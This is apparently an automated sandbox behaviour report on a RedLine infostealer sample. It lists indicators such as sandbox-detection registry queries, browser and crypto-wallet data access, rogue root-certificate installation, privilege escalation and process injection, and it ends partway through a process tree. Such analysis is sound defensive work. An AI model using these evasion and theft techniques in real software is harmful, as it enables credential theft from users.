redline | 56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	68818825803.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	68818825803.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	68538091262.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	68538091262.exe

Loads dropped DLL 64 IoCs

pid	Process
1592	setup_x86_x64_install.exe
1552	setup_installer.exe
1552	setup_installer.exe
1552	setup_installer.exe
1552	setup_installer.exe
1552	setup_installer.exe
1552	setup_installer.exe
1152	setup_install.exe
1152	setup_install.exe
1152	setup_install.exe
1152	setup_install.exe
1152	setup_install.exe
1152	setup_install.exe
1152	setup_install.exe
1152	setup_install.exe
1868	cmd.exe
608	cmd.exe
608	cmd.exe
1744	cmd.exe
1032	cmd.exe
1988	cmd.exe
1988	cmd.exe
1196	cmd.exe
1584	Sun1917b8fb5f09db8.exe
1584	Sun1917b8fb5f09db8.exe
736	cmd.exe
296	cmd.exe
1100	Sun19de8ff4b6aefeb8.exe
1100	Sun19de8ff4b6aefeb8.exe
472	Sun1908b94df837b3158.exe
472	Sun1908b94df837b3158.exe
1120	cmd.exe
1540	cmd.exe
1540	cmd.exe
560	cmd.exe
592	Sun195a1614ec24e6a.exe
592	Sun195a1614ec24e6a.exe
1512	cmd.exe
1984	Sun1966fb31dd5a07.exe
1984	Sun1966fb31dd5a07.exe
240	Sun19eb40faaaa9.exe
240	Sun19eb40faaaa9.exe
1984	Sun1966fb31dd5a07.exe
1944	Sun19262b9e49ad.exe
1944	Sun19262b9e49ad.exe
1116	Sun1966fb31dd5a07.tmp
1116	Sun1966fb31dd5a07.tmp
1116	Sun1966fb31dd5a07.tmp
1116	Sun1966fb31dd5a07.tmp
2188	LzmwAqmV.exe
2188	LzmwAqmV.exe
2188	LzmwAqmV.exe
2188	LzmwAqmV.exe
2476	setup.exe
2188	LzmwAqmV.exe
2188	LzmwAqmV.exe
2520	udptest.exe
2520	udptest.exe
2188	LzmwAqmV.exe
2188	LzmwAqmV.exe
2188	LzmwAqmV.exe
2188	LzmwAqmV.exe
2188	LzmwAqmV.exe
2676	setup_2.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	68818825803.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	68538091262.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2668	68818825803.exe
2652	68538091262.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2660 set thread context of 2116	2660	LzmwAqmV.exe	92
PID 2168 set thread context of 1220	2168	Garbage Cleaner.exe	126
PID 2192 set thread context of 2548	2192	services64.exe	134

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
2132	484	WerFault.exe	54
2124	2604	WerFault.exe	68
2680	240	WerFault.exe	55

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dajradj
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dajradj
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dajradj
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dajradj
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dajradj
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dajradj
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dajradj
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dajradj
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dajradj

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	82489581824.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	82489581824.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	62398706830.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	62398706830.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
1088	schtasks.exe
3032	schtasks.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1216	taskkill.exe
1072	taskkill.exe
2836	taskkill.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun19262b9e49ad.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun19262b9e49ad.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun19262b9e49ad.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun19262b9e49ad.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Sun19262b9e49ad.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Sun19262b9e49ad.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	54	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
472	Sun1908b94df837b3158.exe
472	Sun1908b94df837b3158.exe
1072	powershell.exe
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found

Suspicious behavior: GetForegroundWindowSpam 6 IoCs

pid	Process
1392	Process not Found
2132	WerFault.exe
2124	WerFault.exe
2680	WerFault.exe
1272	setup_2.tmp
2136	dw20.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
472	Sun1908b94df837b3158.exe
2740	dajradj
2280	dajradj
2240	dajradj

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1944	Sun19262b9e49ad.exe
Token: SeAssignPrimaryTokenPrivilege	1944	Sun19262b9e49ad.exe
Token: SeLockMemoryPrivilege	1944	Sun19262b9e49ad.exe
Token: SeIncreaseQuotaPrivilege	1944	Sun19262b9e49ad.exe
Token: SeMachineAccountPrivilege	1944	Sun19262b9e49ad.exe
Token: SeTcbPrivilege	1944	Sun19262b9e49ad.exe
Token: SeSecurityPrivilege	1944	Sun19262b9e49ad.exe
Token: SeTakeOwnershipPrivilege	1944	Sun19262b9e49ad.exe
Token: SeLoadDriverPrivilege	1944	Sun19262b9e49ad.exe
Token: SeSystemProfilePrivilege	1944	Sun19262b9e49ad.exe
Token: SeSystemtimePrivilege	1944	Sun19262b9e49ad.exe
Token: SeProfSingleProcessPrivilege	1944	Sun19262b9e49ad.exe
Token: SeIncBasePriorityPrivilege	1944	Sun19262b9e49ad.exe
Token: SeCreatePagefilePrivilege	1944	Sun19262b9e49ad.exe
Token: SeCreatePermanentPrivilege	1944	Sun19262b9e49ad.exe
Token: SeBackupPrivilege	1944	Sun19262b9e49ad.exe
Token: SeRestorePrivilege	1944	Sun19262b9e49ad.exe
Token: SeShutdownPrivilege	1944	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	1944	Sun19262b9e49ad.exe
Token: SeAuditPrivilege	1944	Sun19262b9e49ad.exe
Token: SeSystemEnvironmentPrivilege	1944	Sun19262b9e49ad.exe
Token: SeChangeNotifyPrivilege	1944	Sun19262b9e49ad.exe
Token: SeRemoteShutdownPrivilege	1944	Sun19262b9e49ad.exe
Token: SeUndockPrivilege	1944	Sun19262b9e49ad.exe
Token: SeSyncAgentPrivilege	1944	Sun19262b9e49ad.exe
Token: SeEnableDelegationPrivilege	1944	Sun19262b9e49ad.exe
Token: SeManageVolumePrivilege	1944	Sun19262b9e49ad.exe
Token: SeImpersonatePrivilege	1944	Sun19262b9e49ad.exe
Token: SeCreateGlobalPrivilege	1944	Sun19262b9e49ad.exe
Token: 31	1944	Sun19262b9e49ad.exe
Token: 32	1944	Sun19262b9e49ad.exe
Token: 33	1944	Sun19262b9e49ad.exe
Token: 34	1944	Sun19262b9e49ad.exe
Token: 35	1944	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	592	Sun195a1614ec24e6a.exe
Token: SeDebugPrivilege	1640	Sun19e4ade31b2a.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	2360	2.exe
Token: SeDebugPrivilege	2300	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeDebugPrivilege	2556	5.exe
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeDebugPrivilege	2968	BearVpn 3.exe
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeDebugPrivilege	2132	WerFault.exe
Token: SeDebugPrivilege	2124	WerFault.exe
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeDebugPrivilege	1216	taskkill.exe
Token: SeDebugPrivilege	2680	WerFault.exe
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found
Token: SeShutdownPrivilege	1392	Process not Found

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1392	Process not Found
1392	Process not Found

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
1392	Process not Found
1392	Process not Found
1392	Process not Found
1392	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1592 wrote to memory of 1552	1592	setup_x86_x64_install.exe	28
PID 1592 wrote to memory of 1552	1592	setup_x86_x64_install.exe	28
PID 1592 wrote to memory of 1552	1592	setup_x86_x64_install.exe	28
PID 1592 wrote to memory of 1552	1592	setup_x86_x64_install.exe	28
PID 1592 wrote to memory of 1552	1592	setup_x86_x64_install.exe	28
PID 1592 wrote to memory of 1552	1592	setup_x86_x64_install.exe	28
PID 1592 wrote to memory of 1552	1592	setup_x86_x64_install.exe	28
PID 1552 wrote to memory of 1152	1552	setup_installer.exe	29
PID 1552 wrote to memory of 1152	1552	setup_installer.exe	29
PID 1552 wrote to memory of 1152	1552	setup_installer.exe	29
PID 1552 wrote to memory of 1152	1552	setup_installer.exe	29
PID 1552 wrote to memory of 1152	1552	setup_installer.exe	29
PID 1552 wrote to memory of 1152	1552	setup_installer.exe	29
PID 1552 wrote to memory of 1152	1552	setup_installer.exe	29
PID 1152 wrote to memory of 1696	1152	setup_install.exe	31
PID 1152 wrote to memory of 1696	1152	setup_install.exe	31
PID 1152 wrote to memory of 1696	1152	setup_install.exe	31
PID 1152 wrote to memory of 1696	1152	setup_install.exe	31
PID 1152 wrote to memory of 1696	1152	setup_install.exe	31
PID 1152 wrote to memory of 1696	1152	setup_install.exe	31
PID 1152 wrote to memory of 1696	1152	setup_install.exe	31
PID 1152 wrote to memory of 1868	1152	setup_install.exe	32
PID 1152 wrote to memory of 1868	1152	setup_install.exe	32
PID 1152 wrote to memory of 1868	1152	setup_install.exe	32
PID 1152 wrote to memory of 1868	1152	setup_install.exe	32
PID 1152 wrote to memory of 1868	1152	setup_install.exe	32
PID 1152 wrote to memory of 1868	1152	setup_install.exe	32
PID 1152 wrote to memory of 1868	1152	setup_install.exe	32
PID 1152 wrote to memory of 1744	1152	setup_install.exe	33
PID 1152 wrote to memory of 1744	1152	setup_install.exe	33
PID 1152 wrote to memory of 1744	1152	setup_install.exe	33
PID 1152 wrote to memory of 1744	1152	setup_install.exe	33
PID 1152 wrote to memory of 1744	1152	setup_install.exe	33
PID 1152 wrote to memory of 1744	1152	setup_install.exe	33
PID 1152 wrote to memory of 1744	1152	setup_install.exe	33
PID 1152 wrote to memory of 1032	1152	setup_install.exe	34
PID 1152 wrote to memory of 1032	1152	setup_install.exe	34
PID 1152 wrote to memory of 1032	1152	setup_install.exe	34
PID 1152 wrote to memory of 1032	1152	setup_install.exe	34
PID 1152 wrote to memory of 1032	1152	setup_install.exe	34
PID 1152 wrote to memory of 1032	1152	setup_install.exe	34
PID 1152 wrote to memory of 1032	1152	setup_install.exe	34
PID 1152 wrote to memory of 736	1152	setup_install.exe	37
PID 1152 wrote to memory of 736	1152	setup_install.exe	37
PID 1152 wrote to memory of 736	1152	setup_install.exe	37
PID 1152 wrote to memory of 736	1152	setup_install.exe	37
PID 1152 wrote to memory of 736	1152	setup_install.exe	37
PID 1152 wrote to memory of 736	1152	setup_install.exe	37
PID 1152 wrote to memory of 736	1152	setup_install.exe	37
PID 1152 wrote to memory of 1988	1152	setup_install.exe	35
PID 1152 wrote to memory of 1988	1152	setup_install.exe	35
PID 1152 wrote to memory of 1988	1152	setup_install.exe	35
PID 1152 wrote to memory of 1988	1152	setup_install.exe	35
PID 1152 wrote to memory of 1988	1152	setup_install.exe	35
PID 1152 wrote to memory of 1988	1152	setup_install.exe	35
PID 1152 wrote to memory of 1988	1152	setup_install.exe	35
PID 1696 wrote to memory of 1072	1696	cmd.exe	36
PID 1696 wrote to memory of 1072	1696	cmd.exe	36
PID 1696 wrote to memory of 1072	1696	cmd.exe	36
PID 1696 wrote to memory of 1072	1696	cmd.exe	36
PID 1696 wrote to memory of 1072	1696	cmd.exe	36
PID 1696 wrote to memory of 1072	1696	cmd.exe	36
PID 1696 wrote to memory of 1072	1696	cmd.exe	36
PID 1152 wrote to memory of 608	1152	setup_install.exe	38

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1592
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS0160ED23\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1152
  - - C:\Windows\SysWOW64\cmd.exe
